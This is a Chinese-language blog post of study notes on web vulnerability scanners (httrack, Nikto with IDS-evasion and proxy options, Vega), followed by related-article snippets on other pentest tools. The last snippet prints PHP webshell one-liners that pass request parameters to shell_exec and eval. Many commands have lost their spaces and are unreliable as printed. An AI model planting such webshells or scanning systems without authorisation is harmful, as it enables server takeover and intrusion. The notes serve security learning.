【安全牛学习笔记】Web扫描器(1)

1.侦察
httrack可将目标网站的网页全部爬取下来,减少侦察过程中与目标服务器发生的交互。

2.Nikto(1).检测对象

扫描软件版本

搜索存在安全隐患的文件

配置漏洞

no404 避免404误判
依据响应内容

去除时间信息取MD5(2).扫描命令

nikto-list-plugins

列出扫描插件

nikto-update

更新插件

nikto-hosthttp://1.1.1.1

指定主机扫描

nikto-host192.168.1.1-ssl-port443,8443,995指定主机及端口进行ssl的扫描
nikto-hosthost.txt
从文件读取扫描目标nmap-p80192.168.1.0/24-oG-|nikto-host-结合nmap使用nikto-host192.168.1.1-useproxyhttp://localhost:8087使用代理-vhost当一个ip地址指向多个虚拟主机时,需要用vhost参数-evasion躲避IDS

设置cookie
修改配置文件/etc/nikto.conf
STATIC-COOKIE="cookie1"="cookievalue";"cookie2"="cookievalu”

扫描时查看详细内容

Space–reportcurrentscanstatus
v–verbosemodeon/off
d–debugmodeon/off
e–errorreportingon/off
p–progressreportingon/off
r–redirectdisplayon/off
c–cookiedisplayon/off
a–authdisplayon/off

q–quit
N–nexthost
P-Pause

3.vega(1).模式

扫描模式
代理模式

(2).功能

爬站,处理表单,注入测试
支持ssl

时间: 2024-12-21 00:51:11

【安全牛学习笔记】Web扫描器(1)的相关文章

【安全牛学习笔记】Web扫描器(2)

skipfish 功能: 递归爬网 基于字典探测 优点:速度快 多路单线程,全异步网络I/O,消除内存管理和调度开销 启发式自动内容识别 误报较低命令: skipfish-otesthttp://1.1.1.1 -o输出目录[email protected] skipfish-otest-Scomplet.wl-Wa.wl调用字典文件 -I: 检查包含指定字符串的url -X: 不检查包含指定字符串的url -K: 不对指定参数进行测试-D: 跨站爬另外一个域 -l: 每秒最大请求数-m: 每I

【安全牛学习笔记】ACUNETIX WEB VULNERABILITY SCANNER

ACUNETIX WEB VULNERABILITY SCANNER 自动手动爬网,支持AJAX.JavaScript AcuSensor灰盒测试 发现爬网无法发现文件 额外的漏洞扫描 可发现存在漏洞的源码行号 支持PHP..NET(不获取源码的情况下注入已编编译.NET) 生成PCI.27001标准和规报告 网络扫描 FTP,DNS,SMTP,IMAP,POP3,SSH,SNMP,Telent 集成openvas扫描漏洞 [email protected]:~# cp /media/sf_D_

【安全牛学习笔记】Kali实战-Web渗透

1.动态web: 可以接受客户端提交的数据,动态交互数据,就会有漏洞的存在 2.web大致框架: (1)浏览器--->web服务器--->应用服务器--->数据库 (2)程序代码 3.http协议基础: 明文通信,没有内建的机密安全机制 https只能提高传输层安全,仍然可以截断信息 使用cookie,身份验证.服务器跟踪客户端根据cookie.客户端拿到的是SessionID,服务器是session. 4.http请求和响应: content-length:(可用于验证是否暴力破解成功

【安全牛学习笔记】?ACUNETIX WEB VULNERABILITY SCANNER

ACUNETIX WEB VULNERABILITY SCANNER 自动手动爬网,支持AJAX.JavaScript AcuSensor灰盒测试 发现爬网无法发现文件 额外的漏洞扫描 可发现存在漏洞的源码行号 支持PHP..NET(不获取源码的情况下注入已编编译.NET) 生成PCI.27001标准和规报告 网络扫描 FTP,DNS,SMTP,IMAP,POP3,SSH,SNMP,Telent 集成openvas扫描漏洞 [email protected]:~# cp /media/sf_D_

【安全牛学习笔记】

弱点扫描 ╋━━━━━━━━━━━━━━━━━━━━╋ ┃发现弱点                                ┃ ┃发现漏洞                                ┃ ┃  基于端口五福扫描结果版本信息(速度慢)┃ ┃  搜索已公开的漏洞数据库(数量大)      ┃ ┃  使用弱点扫描器实现漏洞管理            ┃ ╋━━━━━━━━━━━━━━━━━━━━╋ [email protected]:~# searchsploit Usage:

【安全牛学习笔记】​ NESSUS

NESSUS ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋ ┃NESSUS                                                                    ┃ ┃家庭版                                                                    ┃ ┃    免费                                             

【安全牛学习笔记】OWASP_ZAP

OWASP_ZAP Zed attack proxy WEB Applicaiton集成渗透测试和漏洞挖掘工具 开源免费跨平台简单易用 截断代理 主动.被动扫描 Fuzzy.暴力破解 API http://zap/ Do you want to persist the ZAP Session Yes,I want to persist this session with name based on the current timestamp √ Yes,I want to persist thi

【安全牛学习笔记】Kali Linux渗透测试方法

1.安全问题的根源 ①由于分层思想,导致每个层次的相关人员都只关心自己层次的工作,因此每个人认识系统都是片面的,而安全是全方位的,整体的,所以造成安全问题. ②技术人员追求效率,导致只追求功能实现,而很容易忽略安全性的工作 ③由于人都是会犯错误的,因此最大的安全威胁是人,所以无法避免安全隐患,但可以降低安全风险 软件安全生命周期: 需求-->设计-->编码-->测试-->上线-->运维 安全需求-->系统架构-->编码规范-->代码审计-->部署规范-

【安全牛学习笔记】WEBSHELL

╋━━━━━━━━━━━━━━━━━━━━━━╋ ┃WEBSHELL                                    ┃ ┃<?php echo shell exec($_GET['cmd']);?>      ┃ ┃中国菜刀: http://www.maicaidao.co/          ┃ ┃    <?php @eval($_POST['chopper']);?>       ┃ ┃可能被IDS.AV.WAF.扫描器软件发现查杀      ┃ ┃W